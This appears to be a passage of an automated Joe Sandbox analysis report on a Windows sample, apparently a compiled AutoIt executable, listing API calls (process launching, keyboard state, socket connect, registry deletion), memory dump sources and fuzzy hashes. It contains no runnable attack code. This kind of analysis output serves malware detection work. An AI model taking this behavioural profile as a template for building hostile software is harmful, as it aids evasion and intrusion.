                                                                        • GetWindowLongW.USER32(014C4A20,000000EC), ref: 0091B571
                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0091B589
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                        • String ID:
                                                                        • API String ID: 4072528602-0
                                                                        • Opcode ID: 00035b525dc26d251b88e07f410207da003b9df5a1b1d908cf298c2548cb4b3d
                                                                        • Instruction ID: 0304ba59003ef6fc0ce8e4bbd349ee2d83b6aab7a1d63db4ef82df12566bead8
                                                                        • Opcode Fuzzy Hash: 00035b525dc26d251b88e07f410207da003b9df5a1b1d908cf298c2548cb4b3d
                                                                        • Instruction Fuzzy Hash: 39719C38705308AFDB20DF65C8A4FFA7BBAEF49310F148059FA55972A2C731A891DB50
                                                                        APIs
                                                                        • GetConsoleMode.KERNEL32(?,?), ref: 008BDABC
                                                                        • GetConsoleCP.KERNEL32 ref: 008BDADA
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 008BDC19
                                                                          • Part of subcall function 008B8AF4: __getptd_noexit.LIBCMT ref: 008B8AF4
                                                                          • Part of subcall function 008B8B28: __getptd_noexit.LIBCMT ref: 008B8B28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Console__getptd_noexit$ByteCharModeMultiWide
                                                                        • String ID: Pp>
                                                                        • API String ID: 321029406-1895935624
                                                                        • Opcode ID: 48988313bd47f6c38aaf9577301f878c2042a52a65f3f788b82ff97c35ef1c18
                                                                        • Instruction ID: 0a7ef0747a4b973e558a9103bf02e5476900dc76e43dbe49b099ed34f49adc1e
                                                                        • Opcode Fuzzy Hash: 48988313bd47f6c38aaf9577301f878c2042a52a65f3f788b82ff97c35ef1c18
                                                                        • Instruction Fuzzy Hash: 79714875B066189FCB24CB59DC90AE9B7B4FB0A315F1841D9E40AE6B81DB319E81CF42
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0090F448
                                                                        • _memset.LIBCMT ref: 0090F511
                                                                        • ShellExecuteExW.SHELL32(?), ref: 0090F556
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                          • Part of subcall function 008AFC86: _wcscpy.LIBCMT ref: 008AFCA9
                                                                        • GetProcessId.KERNEL32(00000000), ref: 0090F5CD
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0090F5FC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow_wcscpy
                                                                        • String ID: @
                                                                        • API String ID: 2674045824-2766056989
                                                                        • Opcode ID: b94ecc6160737f3a363008fc375521c70addc37987703c35464b9b819a1073f4
                                                                        • Instruction ID: e40f361074a347ef97c5bf6eaeb7c8d389b7a8399ed5269e6096a8af6f9eb5a8
                                                                        • Opcode Fuzzy Hash: b94ecc6160737f3a363008fc375521c70addc37987703c35464b9b819a1073f4
                                                                        • Instruction Fuzzy Hash: 0561AE71A006199FCF14EF68C8959AEBBF5FF49310F14806DE859AB791DB30AE41CB81
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 008F0F8C
                                                                        • GetKeyboardState.USER32(?), ref: 008F0FA1
                                                                        • SetKeyboardState.USER32(?), ref: 008F1002
                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 008F1030
                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 008F104F
                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 008F1095
                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008F10B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: 5704dd3d07a8e0e3fb143e1bb16fdaa1c6037ef5b51f840990511360c8e28ee5
                                                                        • Instruction ID: 773c9bad2e080c549470c5081f4defb06f1940f1a3d5d6b0683e68b5d5308571
                                                                        • Opcode Fuzzy Hash: 5704dd3d07a8e0e3fb143e1bb16fdaa1c6037ef5b51f840990511360c8e28ee5
                                                                        • Instruction Fuzzy Hash: 4D51D460604BD9BDFF3642348C19BB6BEA9FB46304F088589E2D5C58D3C6A9DCC4DB51
                                                                        APIs
                                                                        • GetParent.USER32(00000000), ref: 008F0DA5
                                                                        • GetKeyboardState.USER32(?), ref: 008F0DBA
                                                                        • SetKeyboardState.USER32(?), ref: 008F0E1B
                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008F0E47
                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008F0E64
                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008F0EA8
                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008F0EC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: e49d9838647917fbb13f4b247732a7e14f839975a74774685c4442071a56f733
                                                                        • Instruction ID: c06cbbc612c14097819f3ff603dbb1841b26b37b1a92381ba9d1a969e7f61eb3
                                                                        • Opcode Fuzzy Hash: e49d9838647917fbb13f4b247732a7e14f839975a74774685c4442071a56f733
                                                                        • Instruction Fuzzy Hash: B051D5A06187DD7DFB3282748C55BBA7E99FB06300F088989E2D4C64C3D795AC94EB51
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsncpy$LocalTime
                                                                        • String ID:
                                                                        • API String ID: 2945705084-0
                                                                        • Opcode ID: 5e2f6709333d5e8fcee2559c5a12b5c3577a70ab8d6971e1af4dc9a0e8e6345b
                                                                        • Instruction ID: 977f5c2f37b5cd69cf49788f9d18f529d1aceadca360168bb2cd18df4f6a4202
                                                                        • Opcode Fuzzy Hash: 5e2f6709333d5e8fcee2559c5a12b5c3577a70ab8d6971e1af4dc9a0e8e6345b
                                                                        • Instruction Fuzzy Hash: 92418365C11618B6CB11FBB88C469DFB7B8FF04310F509956E618E3222EA34A255C7E7
                                                                        APIs
                                                                          • Part of subcall function 008F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008F3697,?), ref: 008F468B
                                                                          • Part of subcall function 008F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008F3697,?), ref: 008F46A4
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 008F36B7
                                                                        • _wcscmp.LIBCMT ref: 008F36D3
                                                                        • MoveFileW.KERNEL32(?,?), ref: 008F36EB
                                                                        • _wcscat.LIBCMT ref: 008F3733
                                                                        • SHFileOperationW.SHELL32(?), ref: 008F379F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                        • String ID: \*.*
                                                                        • API String ID: 1377345388-1173974218
                                                                        • Opcode ID: 38d0ae7c4d962237b7b3693b3e52f16bf7b22585094e84c13ab4c65d31a6b877
                                                                        • Instruction ID: e6a507f698f7d87e6f84a1dd1d2eaec6c70268ef72b39463b8cd04170ee1409c
                                                                        • Opcode Fuzzy Hash: 38d0ae7c4d962237b7b3693b3e52f16bf7b22585094e84c13ab4c65d31a6b877
                                                                        • Instruction Fuzzy Hash: 63417E71508348AAC752EF78C4419EFB7E8FF89380F00092EB59AC3251EA34D689C752
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 009172AA
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00917351
                                                                        • IsMenu.USER32(?), ref: 00917369
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009173B1
                                                                        • DrawMenuBar.USER32 ref: 009173C4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                        • String ID: 0
                                                                        • API String ID: 3866635326-4108050209
                                                                        • Opcode ID: 765911cc424f400f3960e2e2bd11c287b5766190a566865bd238dd91f1bc322a
                                                                        • Instruction ID: 72cf03d97c0905b7600a1a8133e7b92f5f8db7d1877358b01efe124ae2c7107e
                                                                        • Opcode Fuzzy Hash: 765911cc424f400f3960e2e2bd11c287b5766190a566865bd238dd91f1bc322a
                                                                        • Instruction Fuzzy Hash: 15411A75A04209EFDB20DF94E884AEABBF9FB08350F148529FD2597250D730AD91EF60
                                                                        APIs
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00910FD4
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00910FFE
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 009110B5
                                                                          • Part of subcall function 00910FA5: RegCloseKey.ADVAPI32(?), ref: 0091101B
                                                                          • Part of subcall function 00910FA5: FreeLibrary.KERNEL32(?), ref: 0091106D
                                                                          • Part of subcall function 00910FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00911090
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00911058
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 395352322-0
                                                                        • Opcode ID: 4b495883c507e3e769459f8ba1102ef4bf14e94797b3b218f402b011e434f381
                                                                        • Instruction ID: 229bbbad06ec50477e20989b1227df68bdda20f569dda9af20105f3b30c3d55b
                                                                        • Opcode Fuzzy Hash: 4b495883c507e3e769459f8ba1102ef4bf14e94797b3b218f402b011e434f381
                                                                        • Instruction Fuzzy Hash: 1A31FB71E1510DBFDB25DB90DC99AFEB7BCEF08300F004169E606A2151EB759EC59AA0
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009162EC
                                                                        • GetWindowLongW.USER32(014C4A20,000000F0), ref: 0091631F
                                                                        • GetWindowLongW.USER32(014C4A20,000000F0), ref: 00916354
                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00916386
                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009163B0
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 009163C1
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009163DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 2178440468-0
                                                                        • Opcode ID: 0ddf4131c02329b8eea1d5e21d51ccacc413dd548965cc705999f4ec5385a371
                                                                        • Instruction ID: 6d389c6ede40651f73b45d8013f2138586de25dc4e6285ae6c0b1c4f5a7e6008
                                                                        • Opcode Fuzzy Hash: 0ddf4131c02329b8eea1d5e21d51ccacc413dd548965cc705999f4ec5385a371
                                                                        • Instruction Fuzzy Hash: 4C313730B082499FDB20CF19DC94F943BE5FB4A755F1941A8F6218F2B2CB71A881EB50
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?), ref: 008EDB2E
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?), ref: 008EDB54
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 008EDB57
                                                                        • SysAllocString.OLEAUT32(?), ref: 008EDB75
                                                                        • SysFreeString.OLEAUT32(?), ref: 008EDB7E
                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,?), ref: 008EDBA3
                                                                        • SysAllocString.OLEAUT32(?), ref: 008EDBB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: d91efd80fa7065bd5766df9df8dc02d0807fc223fa1c7579483776f8798b08b3
                                                                        • Instruction ID: 18e4d4c9632b0ec9780b724be5dcd812deda98ea07be91ea2c9c9a74d535a818
                                                                        • Opcode Fuzzy Hash: d91efd80fa7065bd5766df9df8dc02d0807fc223fa1c7579483776f8798b08b3
                                                                        • Instruction Fuzzy Hash: 46217C36604219AFAB10DFA9DC88CFB73ACFB4A360B058565FD15DB2A0E6709C459B60
                                                                        APIs
                                                                          • Part of subcall function 00907D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00907DB6
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009061C6
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 009061D5
                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0090620E
                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00906217
                                                                        • WSAGetLastError.WSOCK32 ref: 00906221
                                                                        • closesocket.WSOCK32(00000000), ref: 0090624A
                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00906263
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 910771015-0
                                                                        • Opcode ID: 72acbccc1300af6bf0c3d6500124dbfe4a1e5e1664f7287c53d39dbc9f93bfcb
                                                                        • Instruction ID: c53b41bfbe0e472aaca11161d0dc72b54b798efee0f555fbb2965dd638bf174f
                                                                        • Opcode Fuzzy Hash: 72acbccc1300af6bf0c3d6500124dbfe4a1e5e1664f7287c53d39dbc9f93bfcb
                                                                        • Instruction Fuzzy Hash: 7F31BE31604108AFDF10AF68CC85BBA7BACEF45760F048069F919E72D1DB74AC54DBA2
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                        • API String ID: 1038674560-2734436370
                                                                        • Opcode ID: e5fb44bfb96a183ee92027e93b2533144893bad840ec9a8a6251509d762842a6
                                                                        • Instruction ID: accdbfde732f0be3d44bdba69e04b550ca08e245456e9ef95e610d5c94c5f424
                                                                        • Opcode Fuzzy Hash: e5fb44bfb96a183ee92027e93b2533144893bad840ec9a8a6251509d762842a6
                                                                        • Instruction Fuzzy Hash: 152167722041E167D620A73AAC02EAB73D8FF67354F10403AF641C6162FF609D81C396
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,00000008), ref: 008EDC09
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008EDC2F
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 008EDC32
                                                                        • SysAllocString.OLEAUT32(?), ref: 008EDC53
                                                                        • SysFreeString.OLEAUT32(?), ref: 008EDC5C
                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,00000008), ref: 008EDC76
                                                                        • SysAllocString.OLEAUT32(?), ref: 008EDC84
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 96a356ba485e46ad3c76a53036197a6df95df4c09cd68729b93af96ab23cf497
                                                                        • Instruction ID: abec55bbaa8e59af02c3d17fc5919dfb2b5abad400c6543a34297b57c1cf365f
                                                                        • Opcode Fuzzy Hash: 96a356ba485e46ad3c76a53036197a6df95df4c09cd68729b93af96ab23cf497
                                                                        • Instruction Fuzzy Hash: 94215635608248AF9B10DFA9DC88DAB77ECFB09360B10C125F915CB3A1D674EC45DB64
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • _wprintf.LIBCMT ref: 008EFA17
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008EFA2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$Message_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 1837435165-916153598
                                                                        • Opcode ID: 181c0d8b39ff8411849ae222cad286639c3342bf318f801e3fcc11747cfee58c
                                                                        • Instruction ID: 2040b6ec7ff4ecddbcbca66564e256513aef912ed5598527579db3c5a56201dc
                                                                        • Opcode Fuzzy Hash: 181c0d8b39ff8411849ae222cad286639c3342bf318f801e3fcc11747cfee58c
                                                                        • Instruction Fuzzy Hash: 29211A3280410DAACF05FBA8DD52EEEBB34FF19315F640065F506B50A2EA212F19CB62
                                                                        APIs
                                                                          • Part of subcall function 00891D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00891D73
                                                                          • Part of subcall function 00891D35: GetStockObject.GDI32(00000011), ref: 00891D87
                                                                          • Part of subcall function 00891D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00891D91
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00917632
                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0091763F
                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0091764A
                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00917659
                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00917665
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
